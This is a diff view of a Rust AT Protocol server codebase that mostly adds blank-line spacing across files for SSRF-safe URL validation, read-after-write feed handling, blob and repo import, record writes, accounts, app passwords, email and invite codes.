#[derive(Debug, Clone)]
85
pub enum SsrfError {
86
InvalidUrl,
···
89
NonUnicastIp(String),
90
DnsResolutionFailed(String),
91
}
92
impl std::fmt::Display for SsrfError {
93
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
94
match self {
···
100
}
101
}
102
}
103
impl std::error::Error for SsrfError {}
104
pub const HEADERS_TO_FORWARD: &[&str] = &[
105
"accept-language",
106
"atproto-accept-labelers",
···
112
"retry-after",
113
"content-type",
114
];
115
pub fn validate_at_uri(uri: &str) -> Result<AtUriParts, &'static str> {
116
if !uri.starts_with("at://") {
117
return Err("URI must start with at://");
···
137
rkey: parts.get(2).map(|s| s.to_string()),
138
})
139
}
140
#[derive(Debug, Clone)]
141
pub struct AtUriParts {
142
pub did: String,
143
pub collection: Option<String>,
144
pub rkey: Option<String>,
145
}
146
pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 {
147
match limit {
148
Some(l) if l == 0 => default,
···
151
None => default,
152
}
153
}
154
pub fn validate_did(did: &str) -> Result<(), &'static str> {
155
if !did.starts_with("did:") {
156
return Err("Invalid DID format");
···
165
}
166
Ok(())
167
}
168
#[cfg(test)]
169
mod tests {
170
use super::*;
···
3
use std::sync::OnceLock;
4
use std::time::Duration;
5
use tracing::warn;
6
+
7
pub const DEFAULT_HEADERS_TIMEOUT: Duration = Duration::from_secs(10);
8
pub const DEFAULT_BODY_TIMEOUT: Duration = Duration::from_secs(30);
9
pub const DEFAULT_CONNECT_TIMEOUT: Duration = Duration::from_secs(5);
10
pub const MAX_RESPONSE_SIZE: u64 = 10 * 1024 * 1024;
11
+
12
static PROXY_CLIENT: OnceLock<Client> = OnceLock::new();
13
+
14
pub fn proxy_client() -> &'static Client {
15
PROXY_CLIENT.get_or_init(|| {
16
ClientBuilder::new()
···
23
.expect("Failed to build HTTP client - this indicates a TLS or system configuration issue")
24
})
25
}
26
+
27
pub fn is_ssrf_safe(url: &str) -> Result<(), SsrfError> {
28
let parsed = Url::parse(url).map_err(|_| SsrfError::InvalidUrl)?;
29
let scheme = parsed.scheme();
···
65
}
66
Ok(())
67
}
68
+
69
fn is_unicast_ip(ip: &IpAddr) -> bool {
70
match ip {
71
IpAddr::V4(v4) => {
···
79
IpAddr::V6(v6) => !v6.is_loopback() && !v6.is_multicast() && !v6.is_unspecified(),
80
}
81
}
82
+
83
fn is_private_v4(ip: &std::net::Ipv4Addr) -> bool {
84
let octets = ip.octets();
85
octets[0] == 10
···
87
|| (octets[0] == 192 && octets[1] == 168)
88
|| (octets[0] == 169 && octets[1] == 254)
89
}
90
+
91
#[derive(Debug, Clone)]
92
pub enum SsrfError {
93
InvalidUrl,
···
96
NonUnicastIp(String),
97
DnsResolutionFailed(String),
98
}
99
+
100
impl std::fmt::Display for SsrfError {
101
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
102
match self {
···
108
}
109
}
110
}
111
+
112
impl std::error::Error for SsrfError {}
113
+
114
pub const HEADERS_TO_FORWARD: &[&str] = &[
115
"accept-language",
116
"atproto-accept-labelers",
···
122
"retry-after",
123
"content-type",
124
];
125
+
126
pub fn validate_at_uri(uri: &str) -> Result<AtUriParts, &'static str> {
127
if !uri.starts_with("at://") {
128
return Err("URI must start with at://");
···
148
rkey: parts.get(2).map(|s| s.to_string()),
149
})
150
}
151
+
152
#[derive(Debug, Clone)]
153
pub struct AtUriParts {
154
pub did: String,
155
pub collection: Option<String>,
156
pub rkey: Option<String>,
157
}
158
+
159
pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 {
160
match limit {
161
Some(l) if l == 0 => default,
···
164
None => default,
165
}
166
}
167
+
168
pub fn validate_did(did: &str) -> Result<(), &'static str> {
169
if !did.starts_with("did:") {
170
return Err("Invalid DID format");
···
179
}
180
Ok(())
181
}
182
+
183
#[cfg(test)]
184
mod tests {
185
use super::*;
+19
src/api/read_after_write.rs
+19
src/api/read_after_write.rs
···
17
use std::collections::HashMap;
18
use tracing::{error, info, warn};
19
use uuid::Uuid;
20
pub const REPO_REV_HEADER: &str = "atproto-repo-rev";
21
pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag";
22
#[derive(Debug, Clone, Serialize, Deserialize)]
23
#[serde(rename_all = "camelCase")]
24
pub struct PostRecord {
···
39
#[serde(flatten)]
40
pub extra: HashMap<String, Value>,
41
}
42
#[derive(Debug, Clone, Serialize, Deserialize)]
43
#[serde(rename_all = "camelCase")]
44
pub struct ProfileRecord {
···
55
#[serde(flatten)]
56
pub extra: HashMap<String, Value>,
57
}
58
#[derive(Debug, Clone)]
59
pub struct RecordDescript<T> {
60
pub uri: String,
···
62
pub indexed_at: DateTime<Utc>,
63
pub record: T,
64
}
65
#[derive(Debug, Clone, Serialize, Deserialize)]
66
#[serde(rename_all = "camelCase")]
67
pub struct LikeRecord {
···
72
#[serde(flatten)]
73
pub extra: HashMap<String, Value>,
74
}
75
#[derive(Debug, Clone, Serialize, Deserialize)]
76
#[serde(rename_all = "camelCase")]
77
pub struct LikeSubject {
78
pub uri: String,
79
pub cid: String,
80
}
81
#[derive(Debug, Default)]
82
pub struct LocalRecords {
83
pub count: usize,
···
85
pub posts: Vec<RecordDescript<PostRecord>>,
86
pub likes: Vec<RecordDescript<LikeRecord>>,
87
}
88
pub async fn get_records_since_rev(
89
state: &AppState,
90
did: &str,
···
187
}
188
Ok(result)
189
}
190
pub fn get_local_lag(local: &LocalRecords) -> Option<i64> {
191
let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at);
192
for post in &local.posts {
···
205
}
206
oldest.map(|o| (Utc::now() - o).num_milliseconds())
207
}
208
pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> {
209
headers
210
.get(REPO_REV_HEADER)
211
.and_then(|h| h.to_str().ok())
212
.map(|s| s.to_string())
213
}
214
#[derive(Debug)]
215
pub struct ProxyResponse {
216
pub status: StatusCode,
217
pub headers: HeaderMap,
218
pub body: bytes::Bytes,
219
}
220
pub async fn proxy_to_appview(
221
method: &str,
222
params: &HashMap<String, String>,
···
297
}
298
}
299
}
300
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
301
let mut response = (StatusCode::OK, Json(data)).into_response();
302
if let Some(lag_ms) = lag {
···
308
}
309
response
310
}
311
#[derive(Debug, Clone, Serialize, Deserialize)]
312
#[serde(rename_all = "camelCase")]
313
pub struct AuthorView {
···
320
#[serde(flatten)]
321
pub extra: HashMap<String, Value>,
322
}
323
#[derive(Debug, Clone, Serialize, Deserialize)]
324
#[serde(rename_all = "camelCase")]
325
pub struct PostView {
···
341
#[serde(flatten)]
342
pub extra: HashMap<String, Value>,
343
}
344
#[derive(Debug, Clone, Serialize, Deserialize)]
345
#[serde(rename_all = "camelCase")]
346
pub struct FeedViewPost {
···
354
#[serde(flatten)]
355
pub extra: HashMap<String, Value>,
356
}
357
#[derive(Debug, Clone, Serialize, Deserialize)]
358
pub struct FeedOutput {
359
pub feed: Vec<FeedViewPost>,
360
#[serde(skip_serializing_if = "Option::is_none")]
361
pub cursor: Option<String>,
362
}
363
pub fn format_local_post(
364
descript: &RecordDescript<PostRecord>,
365
author_did: &str,
···
387
extra: HashMap::new(),
388
}
389
}
390
pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) {
391
if posts.is_empty() {
392
return;
···
17
use std::collections::HashMap;
18
use tracing::{error, info, warn};
19
use uuid::Uuid;
20
+
21
pub const REPO_REV_HEADER: &str = "atproto-repo-rev";
22
pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag";
23
+
24
#[derive(Debug, Clone, Serialize, Deserialize)]
25
#[serde(rename_all = "camelCase")]
26
pub struct PostRecord {
···
41
#[serde(flatten)]
42
pub extra: HashMap<String, Value>,
43
}
44
+
45
#[derive(Debug, Clone, Serialize, Deserialize)]
46
#[serde(rename_all = "camelCase")]
47
pub struct ProfileRecord {
···
58
#[serde(flatten)]
59
pub extra: HashMap<String, Value>,
60
}
61
+
62
#[derive(Debug, Clone)]
63
pub struct RecordDescript<T> {
64
pub uri: String,
···
66
pub indexed_at: DateTime<Utc>,
67
pub record: T,
68
}
69
+
70
#[derive(Debug, Clone, Serialize, Deserialize)]
71
#[serde(rename_all = "camelCase")]
72
pub struct LikeRecord {
···
77
#[serde(flatten)]
78
pub extra: HashMap<String, Value>,
79
}
80
+
81
#[derive(Debug, Clone, Serialize, Deserialize)]
82
#[serde(rename_all = "camelCase")]
83
pub struct LikeSubject {
84
pub uri: String,
85
pub cid: String,
86
}
87
+
88
#[derive(Debug, Default)]
89
pub struct LocalRecords {
90
pub count: usize,
···
92
pub posts: Vec<RecordDescript<PostRecord>>,
93
pub likes: Vec<RecordDescript<LikeRecord>>,
94
}
95
+
96
pub async fn get_records_since_rev(
97
state: &AppState,
98
did: &str,
···
195
}
196
Ok(result)
197
}
198
+
199
pub fn get_local_lag(local: &LocalRecords) -> Option<i64> {
200
let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at);
201
for post in &local.posts {
···
214
}
215
oldest.map(|o| (Utc::now() - o).num_milliseconds())
216
}
217
+
218
pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> {
219
headers
220
.get(REPO_REV_HEADER)
221
.and_then(|h| h.to_str().ok())
222
.map(|s| s.to_string())
223
}
224
+
225
#[derive(Debug)]
226
pub struct ProxyResponse {
227
pub status: StatusCode,
228
pub headers: HeaderMap,
229
pub body: bytes::Bytes,
230
}
231
+
232
pub async fn proxy_to_appview(
233
method: &str,
234
params: &HashMap<String, String>,
···
309
}
310
}
311
}
312
+
313
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
314
let mut response = (StatusCode::OK, Json(data)).into_response();
315
if let Some(lag_ms) = lag {
···
321
}
322
response
323
}
324
+
325
#[derive(Debug, Clone, Serialize, Deserialize)]
326
#[serde(rename_all = "camelCase")]
327
pub struct AuthorView {
···
334
#[serde(flatten)]
335
pub extra: HashMap<String, Value>,
336
}
337
+
338
#[derive(Debug, Clone, Serialize, Deserialize)]
339
#[serde(rename_all = "camelCase")]
340
pub struct PostView {
···
356
#[serde(flatten)]
357
pub extra: HashMap<String, Value>,
358
}
359
+
360
#[derive(Debug, Clone, Serialize, Deserialize)]
361
#[serde(rename_all = "camelCase")]
362
pub struct FeedViewPost {
···
370
#[serde(flatten)]
371
pub extra: HashMap<String, Value>,
372
}
373
+
374
#[derive(Debug, Clone, Serialize, Deserialize)]
375
pub struct FeedOutput {
376
pub feed: Vec<FeedViewPost>,
377
#[serde(skip_serializing_if = "Option::is_none")]
378
pub cursor: Option<String>,
379
}
380
+
381
pub fn format_local_post(
382
descript: &RecordDescript<PostRecord>,
383
author_did: &str,
···
405
extra: HashMap::new(),
406
}
407
}
408
+
409
pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) {
410
if posts.is_empty() {
411
return;
+7
src/api/repo/blob.rs
+7
src/api/repo/blob.rs
···
14
use sha2::{Digest, Sha256};
15
use std::str::FromStr;
16
use tracing::error;
17
const MAX_BLOB_SIZE: usize = 1_000_000;
18
pub async fn upload_blob(
19
State(state): State<AppState>,
20
headers: axum::http::HeaderMap,
···
154
}))
155
.into_response()
156
}
157
#[derive(Deserialize)]
158
pub struct ListMissingBlobsParams {
159
pub limit: Option<i64>,
160
pub cursor: Option<String>,
161
}
162
#[derive(Serialize)]
163
#[serde(rename_all = "camelCase")]
164
pub struct RecordBlob {
165
pub cid: String,
166
pub record_uri: String,
167
}
168
#[derive(Serialize)]
169
pub struct ListMissingBlobsOutput {
170
pub cursor: Option<String>,
171
pub blobs: Vec<RecordBlob>,
172
}
173
fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) {
174
if let Some(obj) = val.as_object() {
175
if let Some(type_val) = obj.get("$type") {
···
192
}
193
}
194
}
195
pub async fn list_missing_blobs(
196
State(state): State<AppState>,
197
headers: axum::http::HeaderMap,
···
14
use sha2::{Digest, Sha256};
15
use std::str::FromStr;
16
use tracing::error;
17
+
18
const MAX_BLOB_SIZE: usize = 1_000_000;
19
+
20
pub async fn upload_blob(
21
State(state): State<AppState>,
22
headers: axum::http::HeaderMap,
···
156
}))
157
.into_response()
158
}
159
+
160
#[derive(Deserialize)]
161
pub struct ListMissingBlobsParams {
162
pub limit: Option<i64>,
163
pub cursor: Option<String>,
164
}
165
+
166
#[derive(Serialize)]
167
#[serde(rename_all = "camelCase")]
168
pub struct RecordBlob {
169
pub cid: String,
170
pub record_uri: String,
171
}
172
+
173
#[derive(Serialize)]
174
pub struct ListMissingBlobsOutput {
175
pub cursor: Option<String>,
176
pub blobs: Vec<RecordBlob>,
177
}
178
+
179
fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) {
180
if let Some(obj) = val.as_object() {
181
if let Some(type_val) = obj.get("$type") {
···
198
}
199
}
200
}
201
+
202
pub async fn list_missing_blobs(
203
State(state): State<AppState>,
204
headers: axum::http::HeaderMap,
+3
src/api/repo/import.rs
+3
src/api/repo/import.rs
···
11
};
12
use serde_json::json;
13
use tracing::{debug, error, info, warn};
14
const DEFAULT_MAX_IMPORT_SIZE: usize = 100 * 1024 * 1024;
15
const DEFAULT_MAX_BLOCKS: usize = 50000;
16
pub async fn import_repo(
17
State(state): State<AppState>,
18
headers: axum::http::HeaderMap,
···
355
}
356
}
357
}
358
async fn sequence_import_event(
359
state: &AppState,
360
did: &str,
···
11
};
12
use serde_json::json;
13
use tracing::{debug, error, info, warn};
14
+
15
const DEFAULT_MAX_IMPORT_SIZE: usize = 100 * 1024 * 1024;
16
const DEFAULT_MAX_BLOCKS: usize = 50000;
17
+
18
pub async fn import_repo(
19
State(state): State<AppState>,
20
headers: axum::http::HeaderMap,
···
357
}
358
}
359
}
360
+
361
async fn sequence_import_event(
362
state: &AppState,
363
did: &str,
+2
src/api/repo/meta.rs
+2
src/api/repo/meta.rs
+1
src/api/repo/mod.rs
+1
src/api/repo/mod.rs
+7
src/api/repo/record/batch.rs
+7
src/api/repo/record/batch.rs
···
17
use std::str::FromStr;
18
use std::sync::Arc;
19
use tracing::error;
20
const MAX_BATCH_WRITES: usize = 200;
21
#[derive(Deserialize)]
22
#[serde(tag = "$type")]
23
pub enum WriteOp {
···
36
#[serde(rename = "com.atproto.repo.applyWrites#delete")]
37
Delete { collection: String, rkey: String },
38
}
39
#[derive(Deserialize)]
40
#[serde(rename_all = "camelCase")]
41
pub struct ApplyWritesInput {
···
44
pub writes: Vec<WriteOp>,
45
pub swap_commit: Option<String>,
46
}
47
#[derive(Serialize)]
48
#[serde(tag = "$type")]
49
pub enum WriteResult {
···
54
#[serde(rename = "com.atproto.repo.applyWrites#deleteResult")]
55
DeleteResult {},
56
}
57
#[derive(Serialize)]
58
pub struct ApplyWritesOutput {
59
pub commit: CommitInfo,
60
pub results: Vec<WriteResult>,
61
}
62
#[derive(Serialize)]
63
pub struct CommitInfo {
64
pub cid: String,
65
pub rev: String,
66
}
67
pub async fn apply_writes(
68
State(state): State<AppState>,
69
headers: axum::http::HeaderMap,
···
17
use std::str::FromStr;
18
use std::sync::Arc;
19
use tracing::error;
20
+
21
const MAX_BATCH_WRITES: usize = 200;
22
+
23
#[derive(Deserialize)]
24
#[serde(tag = "$type")]
25
pub enum WriteOp {
···
38
#[serde(rename = "com.atproto.repo.applyWrites#delete")]
39
Delete { collection: String, rkey: String },
40
}
41
+
42
#[derive(Deserialize)]
43
#[serde(rename_all = "camelCase")]
44
pub struct ApplyWritesInput {
···
47
pub writes: Vec<WriteOp>,
48
pub swap_commit: Option<String>,
49
}
50
+
51
#[derive(Serialize)]
52
#[serde(tag = "$type")]
53
pub enum WriteResult {
···
58
#[serde(rename = "com.atproto.repo.applyWrites#deleteResult")]
59
DeleteResult {},
60
}
61
+
62
#[derive(Serialize)]
63
pub struct ApplyWritesOutput {
64
pub commit: CommitInfo,
65
pub results: Vec<WriteResult>,
66
}
67
+
68
#[derive(Serialize)]
69
pub struct CommitInfo {
70
pub cid: String,
71
pub rev: String,
72
}
73
+
74
pub async fn apply_writes(
75
State(state): State<AppState>,
76
headers: axum::http::HeaderMap,
+2
src/api/repo/record/delete.rs
+2
src/api/repo/record/delete.rs
···
16
use std::str::FromStr;
17
use std::sync::Arc;
18
use tracing::error;
19
#[derive(Deserialize)]
20
pub struct DeleteRecordInput {
21
pub repo: String,
···
26
#[serde(rename = "swapCommit")]
27
pub swap_commit: Option<String>,
28
}
29
pub async fn delete_record(
30
State(state): State<AppState>,
31
headers: HeaderMap,
···
16
use std::str::FromStr;
17
use std::sync::Arc;
18
use tracing::error;
19
+
20
#[derive(Deserialize)]
21
pub struct DeleteRecordInput {
22
pub repo: String,
···
27
#[serde(rename = "swapCommit")]
28
pub swap_commit: Option<String>,
29
}
30
+
31
pub async fn delete_record(
32
State(state): State<AppState>,
33
headers: HeaderMap,
+1
src/api/repo/record/mod.rs
+1
src/api/repo/record/mod.rs
+2
src/api/repo/record/read.rs
+2
src/api/repo/record/read.rs
···
12
use std::collections::HashMap;
13
use std::str::FromStr;
14
use tracing::error;
15
#[derive(Deserialize)]
16
pub struct GetRecordInput {
17
pub repo: String,
···
19
pub rkey: String,
20
pub cid: Option<String>,
21
}
22
pub async fn get_record(
23
State(state): State<AppState>,
24
Query(input): Query<GetRecordInput>,
···
12
use std::collections::HashMap;
13
use std::str::FromStr;
14
use tracing::error;
15
+
16
#[derive(Deserialize)]
17
pub struct GetRecordInput {
18
pub repo: String,
···
20
pub rkey: String,
21
pub cid: Option<String>,
22
}
23
+
24
pub async fn get_record(
25
State(state): State<AppState>,
26
Query(input): Query<GetRecordInput>,
+4
src/api/repo/record/utils.rs
+4
src/api/repo/record/utils.rs
···
28
rev: &'a str,
29
version: i64,
30
}
31
fn create_signed_commit(
32
did: &str,
33
data: Cid,
···
68
.map_err(|e| format!("Failed to serialize signed commit: {:?}", e))?;
69
Ok((signed_bytes, sig_bytes))
70
}
71
pub enum RecordOp {
72
Create { collection: String, rkey: String, cid: Cid },
73
Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> },
74
Delete { collection: String, rkey: String, prev: Option<Cid> },
75
}
76
pub struct CommitResult {
77
pub commit_cid: Cid,
78
pub rev: String,
79
}
80
pub async fn commit_and_log(
81
state: &AppState,
82
did: &str,
···
28
rev: &'a str,
29
version: i64,
30
}
31
+
32
fn create_signed_commit(
33
did: &str,
34
data: Cid,
···
69
.map_err(|e| format!("Failed to serialize signed commit: {:?}", e))?;
70
Ok((signed_bytes, sig_bytes))
71
}
72
+
73
pub enum RecordOp {
74
Create { collection: String, rkey: String, cid: Cid },
75
Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> },
76
Delete { collection: String, rkey: String, prev: Option<Cid> },
77
}
78
+
79
pub struct CommitResult {
80
pub commit_cid: Cid,
81
pub rev: String,
82
}
83
+
84
pub async fn commit_and_log(
85
state: &AppState,
86
did: &str,
+1
src/api/repo/record/validation.rs
+1
src/api/repo/record/validation.rs
+2
src/api/repo/record/write.rs
+2
src/api/repo/record/write.rs
···
18
use std::sync::Arc;
19
use tracing::error;
20
use uuid::Uuid;
21
pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> {
22
let row = sqlx::query(
23
r#"
···
44
None => Ok(false),
45
}
46
}
47
pub async fn prepare_repo_write(
48
state: &AppState,
49
headers: &HeaderMap,
···
18
use std::sync::Arc;
19
use tracing::error;
20
use uuid::Uuid;
21
+
22
pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> {
23
let row = sqlx::query(
24
r#"
···
45
None => Ok(false),
46
}
47
}
48
+
49
pub async fn prepare_repo_write(
50
state: &AppState,
51
headers: &HeaderMap,
+8
src/api/server/account_status.rs
+8
src/api/server/account_status.rs
···
12
use serde_json::json;
13
use tracing::{error, info, warn};
14
use uuid::Uuid;
15
#[derive(Serialize)]
16
#[serde(rename_all = "camelCase")]
17
pub struct CheckAccountStatusOutput {
···
25
pub expected_blobs: i64,
26
pub imported_blobs: i64,
27
}
28
pub async fn check_account_status(
29
State(state): State<AppState>,
30
headers: axum::http::HeaderMap,
···
94
)
95
.into_response()
96
}
97
pub async fn activate_account(
98
State(state): State<AppState>,
99
headers: axum::http::HeaderMap,
···
133
}
134
}
135
}
136
#[derive(Deserialize)]
137
#[serde(rename_all = "camelCase")]
138
pub struct DeactivateAccountInput {
139
pub delete_after: Option<String>,
140
}
141
pub async fn deactivate_account(
142
State(state): State<AppState>,
143
headers: axum::http::HeaderMap,
···
178
}
179
}
180
}
181
pub async fn request_account_delete(
182
State(state): State<AppState>,
183
headers: axum::http::HeaderMap,
···
232
info!("Account deletion requested for user {}", did);
233
(StatusCode::OK, Json(json!({}))).into_response()
234
}
235
#[derive(Deserialize)]
236
pub struct DeleteAccountInput {
237
pub did: String,
238
pub password: String,
239
pub token: String,
240
}
241
pub async fn delete_account(
242
State(state): State<AppState>,
243
Json(input): Json<DeleteAccountInput>,
···
12
use serde_json::json;
13
use tracing::{error, info, warn};
14
use uuid::Uuid;
15
+
16
#[derive(Serialize)]
17
#[serde(rename_all = "camelCase")]
18
pub struct CheckAccountStatusOutput {
···
26
pub expected_blobs: i64,
27
pub imported_blobs: i64,
28
}
29
+
30
pub async fn check_account_status(
31
State(state): State<AppState>,
32
headers: axum::http::HeaderMap,
···
96
)
97
.into_response()
98
}
99
+
100
pub async fn activate_account(
101
State(state): State<AppState>,
102
headers: axum::http::HeaderMap,
···
136
}
137
}
138
}
139
+
140
#[derive(Deserialize)]
141
#[serde(rename_all = "camelCase")]
142
pub struct DeactivateAccountInput {
143
pub delete_after: Option<String>,
144
}
145
+
146
pub async fn deactivate_account(
147
State(state): State<AppState>,
148
headers: axum::http::HeaderMap,
···
183
}
184
}
185
}
186
+
187
pub async fn request_account_delete(
188
State(state): State<AppState>,
189
headers: axum::http::HeaderMap,
···
238
info!("Account deletion requested for user {}", did);
239
(StatusCode::OK, Json(json!({}))).into_response()
240
}
241
+
242
#[derive(Deserialize)]
243
pub struct DeleteAccountInput {
244
pub did: String,
245
pub password: String,
246
pub token: String,
247
}
248
+
249
pub async fn delete_account(
250
State(state): State<AppState>,
251
Json(input): Json<DeleteAccountInput>,
+8
src/api/server/app_password.rs
+8
src/api/server/app_password.rs
···
11
use serde::{Deserialize, Serialize};
12
use serde_json::json;
13
use tracing::{error, warn};
14
#[derive(Serialize)]
15
#[serde(rename_all = "camelCase")]
16
pub struct AppPassword {
···
18
pub created_at: String,
19
pub privileged: bool,
20
}
21
#[derive(Serialize)]
22
pub struct ListAppPasswordsOutput {
23
pub passwords: Vec<AppPassword>,
24
}
25
pub async fn list_app_passwords(
26
State(state): State<AppState>,
27
BearerAuth(auth_user): BearerAuth,
···
54
}
55
}
56
}
57
#[derive(Deserialize)]
58
pub struct CreateAppPasswordInput {
59
pub name: String,
60
pub privileged: Option<bool>,
61
}
62
#[derive(Serialize)]
63
#[serde(rename_all = "camelCase")]
64
pub struct CreateAppPasswordOutput {
···
67
pub created_at: String,
68
pub privileged: bool,
69
}
70
pub async fn create_app_password(
71
State(state): State<AppState>,
72
headers: HeaderMap,
···
146
}
147
}
148
}
149
#[derive(Deserialize)]
150
pub struct RevokeAppPasswordInput {
151
pub name: String,
152
}
153
pub async fn revoke_app_password(
154
State(state): State<AppState>,
155
BearerAuth(auth_user): BearerAuth,
···
11
use serde::{Deserialize, Serialize};
12
use serde_json::json;
13
use tracing::{error, warn};
14
+
15
#[derive(Serialize)]
16
#[serde(rename_all = "camelCase")]
17
pub struct AppPassword {
···
19
pub created_at: String,
20
pub privileged: bool,
21
}
22
+
23
#[derive(Serialize)]
24
pub struct ListAppPasswordsOutput {
25
pub passwords: Vec<AppPassword>,
26
}
27
+
28
pub async fn list_app_passwords(
29
State(state): State<AppState>,
30
BearerAuth(auth_user): BearerAuth,
···
57
}
58
}
59
}
60
+
61
#[derive(Deserialize)]
62
pub struct CreateAppPasswordInput {
63
pub name: String,
64
pub privileged: Option<bool>,
65
}
66
+
67
#[derive(Serialize)]
68
#[serde(rename_all = "camelCase")]
69
pub struct CreateAppPasswordOutput {
···
72
pub created_at: String,
73
pub privileged: bool,
74
}
75
+
76
pub async fn create_app_password(
77
State(state): State<AppState>,
78
headers: HeaderMap,
···
152
}
153
}
154
}
155
+
156
#[derive(Deserialize)]
157
pub struct RevokeAppPasswordInput {
158
pub name: String,
159
}
160
+
161
pub async fn revoke_app_password(
162
State(state): State<AppState>,
163
BearerAuth(auth_user): BearerAuth,
+7
src/api/server/email.rs
+7
src/api/server/email.rs
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
fn generate_confirmation_code() -> String {
14
crate::util::generate_token_code()
15
}
16
#[derive(Deserialize)]
17
#[serde(rename_all = "camelCase")]
18
pub struct RequestEmailUpdateInput {
19
pub email: String,
20
}
21
pub async fn request_email_update(
22
State(state): State<AppState>,
23
headers: axum::http::HeaderMap,
···
119
info!("Email update requested for user {}", user_id);
120
(StatusCode::OK, Json(json!({ "tokenRequired": true }))).into_response()
121
}
122
#[derive(Deserialize)]
123
#[serde(rename_all = "camelCase")]
124
pub struct ConfirmEmailInput {
125
pub email: String,
126
pub token: String,
127
}
128
pub async fn confirm_email(
129
State(state): State<AppState>,
130
headers: axum::http::HeaderMap,
···
236
info!("Email updated for user {}", user_id);
237
(StatusCode::OK, Json(json!({}))).into_response()
238
}
239
#[derive(Deserialize)]
240
#[serde(rename_all = "camelCase")]
241
pub struct UpdateEmailInput {
···
244
pub email_auth_factor: Option<bool>,
245
pub token: Option<String>,
246
}
247
pub async fn update_email(
248
State(state): State<AppState>,
249
headers: axum::http::HeaderMap,
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info, warn};
13
+
14
fn generate_confirmation_code() -> String {
15
crate::util::generate_token_code()
16
}
17
+
18
#[derive(Deserialize)]
19
#[serde(rename_all = "camelCase")]
20
pub struct RequestEmailUpdateInput {
21
pub email: String,
22
}
23
+
24
pub async fn request_email_update(
25
State(state): State<AppState>,
26
headers: axum::http::HeaderMap,
···
122
info!("Email update requested for user {}", user_id);
123
(StatusCode::OK, Json(json!({ "tokenRequired": true }))).into_response()
124
}
125
+
126
#[derive(Deserialize)]
127
#[serde(rename_all = "camelCase")]
128
pub struct ConfirmEmailInput {
129
pub email: String,
130
pub token: String,
131
}
132
+
133
pub async fn confirm_email(
134
State(state): State<AppState>,
135
headers: axum::http::HeaderMap,
···
241
info!("Email updated for user {}", user_id);
242
(StatusCode::OK, Json(json!({}))).into_response()
243
}
244
+
245
#[derive(Deserialize)]
246
#[serde(rename_all = "camelCase")]
247
pub struct UpdateEmailInput {
···
250
pub email_auth_factor: Option<bool>,
251
pub token: Option<String>,
252
}
253
+
254
pub async fn update_email(
255
State(state): State<AppState>,
256
headers: axum::http::HeaderMap,
+12
src/api/server/invite.rs
+12
src/api/server/invite.rs
···
10
use serde::{Deserialize, Serialize};
11
use tracing::error;
12
use uuid::Uuid;
13
#[derive(Deserialize)]
14
#[serde(rename_all = "camelCase")]
15
pub struct CreateInviteCodeInput {
16
pub use_count: i32,
17
pub for_account: Option<String>,
18
}
19
#[derive(Serialize)]
20
pub struct CreateInviteCodeOutput {
21
pub code: String,
22
}
23
pub async fn create_invite_code(
24
State(state): State<AppState>,
25
BearerAuth(auth_user): BearerAuth,
···
81
}
82
}
83
}
84
#[derive(Deserialize)]
85
#[serde(rename_all = "camelCase")]
86
pub struct CreateInviteCodesInput {
···
88
pub use_count: i32,
89
pub for_accounts: Option<Vec<String>>,
90
}
91
#[derive(Serialize)]
92
pub struct CreateInviteCodesOutput {
93
pub codes: Vec<AccountCodes>,
94
}
95
#[derive(Serialize)]
96
pub struct AccountCodes {
97
pub account: String,
98
pub codes: Vec<String>,
99
}
100
pub async fn create_invite_codes(
101
State(state): State<AppState>,
102
BearerAuth(auth_user): BearerAuth,
···
172
}
173
Json(CreateInviteCodesOutput { codes: result_codes }).into_response()
174
}
175
#[derive(Deserialize)]
176
#[serde(rename_all = "camelCase")]
177
pub struct GetAccountInviteCodesParams {
178
pub include_used: Option<bool>,
179
pub create_available: Option<bool>,
180
}
181
#[derive(Serialize)]
182
#[serde(rename_all = "camelCase")]
183
pub struct InviteCode {
···
189
pub created_at: String,
190
pub uses: Vec<InviteCodeUse>,
191
}
192
#[derive(Serialize)]
193
#[serde(rename_all = "camelCase")]
194
pub struct InviteCodeUse {
195
pub used_by: String,
196
pub used_at: String,
197
}
198
#[derive(Serialize)]
199
pub struct GetAccountInviteCodesOutput {
200
pub codes: Vec<InviteCode>,
201
}
202
pub async fn get_account_invite_codes(
203
State(state): State<AppState>,
204
BearerAuth(auth_user): BearerAuth,
···
10
use serde::{Deserialize, Serialize};
11
use tracing::error;
12
use uuid::Uuid;
13
+
14
#[derive(Deserialize)]
15
#[serde(rename_all = "camelCase")]
16
pub struct CreateInviteCodeInput {
17
pub use_count: i32,
18
pub for_account: Option<String>,
19
}
20
+
21
#[derive(Serialize)]
22
pub struct CreateInviteCodeOutput {
23
pub code: String,
24
}
25
+
26
pub async fn create_invite_code(
27
State(state): State<AppState>,
28
BearerAuth(auth_user): BearerAuth,
···
84
}
85
}
86
}
87
+
88
#[derive(Deserialize)]
89
#[serde(rename_all = "camelCase")]
90
pub struct CreateInviteCodesInput {
···
92
pub use_count: i32,
93
pub for_accounts: Option<Vec<String>>,
94
}
95
+
96
#[derive(Serialize)]
97
pub struct CreateInviteCodesOutput {
98
pub codes: Vec<AccountCodes>,
99
}
100
+
101
#[derive(Serialize)]
102
